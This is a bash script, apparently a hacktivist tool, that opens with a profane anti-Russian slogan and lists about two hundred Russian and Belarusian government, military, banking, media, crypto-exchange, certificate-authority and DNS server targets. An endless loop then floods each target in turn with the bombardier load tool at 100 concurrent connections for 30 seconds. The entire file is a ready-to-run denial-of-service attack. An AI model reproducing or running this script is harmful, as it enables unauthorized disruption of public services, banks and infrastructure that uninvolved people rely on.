#!/bin/bash -x
set -x

echo "Russian IT insfrastructure GO FUCK YOURSELF!!!"

DESTS=( 
    "https://www.gazprom.ru/" 
    "https://lukoil.ru"
    "https://magnit.ru/" 
    "https://www.nornickel.com/"
    "https://www.surgutneftegas.ru/"
    "https://www.tatneft.ru/"
    "https://www.evraz.com/ru/" 
    "https://nlmk.com/"
    "https://www.sibur.ru/" 
    "https://www.severstal.com/" 
    "https://www.metalloinvest.com/" 
    "https://nangs.org/"
    "https://rmk-group.ru/ru/" 
    "https://www.tmk-group.ru/" 
    "https://ya.ru/" 
    "https://www.polymetalinternational.com/ru/" 
    "https://www.uralkali.com/ru/"
    "https://www.eurosib.ru/" 
    "https://omk.ru/"
    "https://www.sberbank.ru/" 
    "https://www.vtb.ru"
    "https://www.gazprombank.ru/"
    "https://www.gosuslugi.ru/"
    "https://www.mos.ru/uslugi/"
    "http://kremlin.ru/"
    "http://government.ru/"
    "https://mil.ru/"
    "https://www.nalog.gov.ru/" 
    "https://customs.gov.ru/" 
    "https://pfr.gov.ru/" 
    "https://rkn.gov.ru/"
    "https://mail.rkn.gov.ru/"
    "https://cloud.rkn.gov.ru/"
    "https://mvd.gov.ru/"
    "https://pwd.wto.economy.gov.ru/"
    "https://stroi.gov.ru/"
    "https://proverki.gov.ru/"

    "ria.ru"
    "gazeta.ru"
    "kp.ru"
    "riafan.ru"
    "pikabu.ru"
    "kommersant.ru"
    "mk.ru"
    "yaplakal.com"
    "rbc.ru"
    "bezformata.com"

    "https://api.developer.sber.ru/product/SberbankID"

    "https://shop-rt.com"

    "https://dnr-news.com/"
    "https://dnronline.su/"
    "https://rusvesna.su/"
    "https://lug-info.com/"
    "https://denis-pushilin.ru/"
    "https://iz.ru/tag/donbass"

    "http://belta.by/"
    "https://sputnik.by/"
    "https://www.tvr.by/"
    "https://www.sb.by/"
    "https://belmarket.by/"
    "https://www.belarus.by/"
    "https://belarus24.by/"
    "https://ont.by/"
    "https://www.024.by/"
    "https://www.belnovosti.by/"
    "https://mogilevnews.by/"
    "https://www.mil.by/"
    "https://yandex.by/"
    "https://www.slonves.by/"
    "http://www.ctv.by/"
    "https://radiobelarus.by/"
    "https://radiusfm.by/"
    "https://alfaradio.by/"
    "https://radiomir.by/"
    "https://radiostalica.by/"
    "https://radiobrestfm.by/"
    "https://www.tvrmogilev.by/"
    "https://minsknews.by/"
    "https://zarya.by/"
    "https://grodnonews.by/"

    "https://rec.gov.by/ru"

    "www.mil.by"
    "www.government.by"
    "https://president.gov.by/ru"
    "https://www.mvd.gov.by/ru"
    "http://www.kgb.by/ru/"
    "http://www.prokuratura.gov.by/"

    "http://www.nbrb.by/"
    "https://belarusbank.by/"
    "https://brrb.by/"
    "https://www.belapb.by/"
    "https://bankdabrabyt.by/"
    "https://belinvestbank.by/individual"

    "https://bgp.by/ru/"
    "https://www.belneftekhim.by"
    "http://www.bellegprom.by"
    "https://www.energo.by"
    "http://belres.by/ru/"

    "https://www.moex.com/"

    "www.sberbank.ru"

    "http://www.fsb.ru/"

    "https://cleanbtc.ru/"
    "https://bonkypay.com/"
    "https://changer.club/"
    "https://superchange.net"
    "https://mine.exchange/"
    "https://platov.co"
    "https://ww-pay.net"
    "https://delets.cash/"
    "https://betatransfer.org"
    "https://ramon.money/"
    "https://coinpaymaster.com"
    "https://bitokk.biz"
    "https://www.netex24.net"
    "https://www.netex24.net/"
    "https://cashbank.pro"
    "https://flashobmen.com"
    "https://abcobmen.com"
    "https://ychanger.net"
    "https://multichange.net"
    "https://24paybank.ne"
    "https://royal.cash"
    "https://prostocash.com"
    "https://baksman.org"
    "https://kupibit.me"
    "https://abcobmen.com"

    "https://gosuslugi41.ru"
    "https://uslugi27.ru"
    "https://gosuslugi29.ru"
    "https://gosuslugi.astrobl.ru"

    "https://iecp.ru/ep/ep-verification"
    "https://iecp.ru/ep/uc-list"
    "https://uc-osnovanie.ru/"
    "http://www.nucrf.ru"
    "http://www.belinfonalog.ru"
    "http://www.roseltorg.ru"
    "http://www.astralnalog.ru"
    "http://www.nwudc.ru"
    "http://www.center-inform.ru"
    "https://kk.bank/UdTs"
    "http://structure.mil.ru/structure/uc/info.htm"
    "http://www.ucpir.ru"
    "http://dreamkas.ru"
    "http://www.e-portal.ru"
    "http://izhtender.ru"
    "http://imctax.parus-s.ru"
    "http://www.icentr.ru"
    "http://www.kartoteka.ru"
    "http://rsbis.ru/elektronnaya-podpis"
    "http://www.stv-it.ru"
    "http://www.crypset.ru"
    "http://www.kt-69.ru"
    "http://www.24ecp.ru"
    "http://kraskript.com"
    "http://ca.ntssoft.ru"
    "http://www.y-center.ru"
    "http://www.rcarus.ru"
    "http://rk72.ru"
    "http://squaretrade.ru"
    "http://ca.gisca.ru"
    "http://www.otchet-online.ru"
    "http://udcs.ru"
    "http://www.cit-ufa.ru"
    "http://elkursk.ru"
    "http://www.icvibor.ru"
    "http://ucestp.ru"
    "http://mcspro.ru"
    "http://www.infotrust.ru"
    "http://epnow.ru"
    "http://ca.kamgov.ru"
    "http://mascom-it.ru"
    "http://cfmc.ru"

    "http://duma.gov.ru/" 
    "http://president-sovet.ru/" 
    "https://sovetnational.ru/" 
    "https://www.gosuslugi.ru/ru/" 
    "https://zakupki.gov.ru/epz/main/public/home.html" 
    "https://gossluzhba.gov.ru/" 
    "http://defence.council.gov.ru/" 
    "http://budget.council.gov.ru/" 
    "http://www.kremlin.ru/" 
    "https://government.ru/" 
    "http://www.scrf.gov.ru/" 
    "http://www.ksrf.ru/ru/Pages/default.aspx" 
    "http://www.vsrf.ru/" 
    "http://premier.gov.ru/events/" 
    "https://www.mchs.gov.ru/" 
    "https://minjust.gov.ru/ru/" 
    "http://www.fsb.ru/" 
    "https://rosguard.gov.ru/" 
    "https://customs.gov.ru/" 
    "https://udprf.ru/" 
    "http://favt.gov.ru/" 
    "http://194.67.2.109:53/UDP" 
    "http://194.67.7.1:53/UDP" 
    "http://194.54.14.187:53/UDP" 
    "http://194.54.14.186:53/UDP"

    "https://more.tv/"
    "https://www.vesti.ru/"
    "https://smotrim.ru/"
    "https://trt-tv.ru/"
    "https://radiovesti.ru/"
    "https://vestinn.ru/"
    "https://vesti-ural.ru/"
    "https://www.m24.ru/"
    "http://www.e-vesti.ru/"
)

TIME="30s"

while true
do
    for DEST in ${DESTS[@]}
    do
        docker run -ti --rm alpine/bombardier -c 100 -d $TIME -l $DEST
    done
done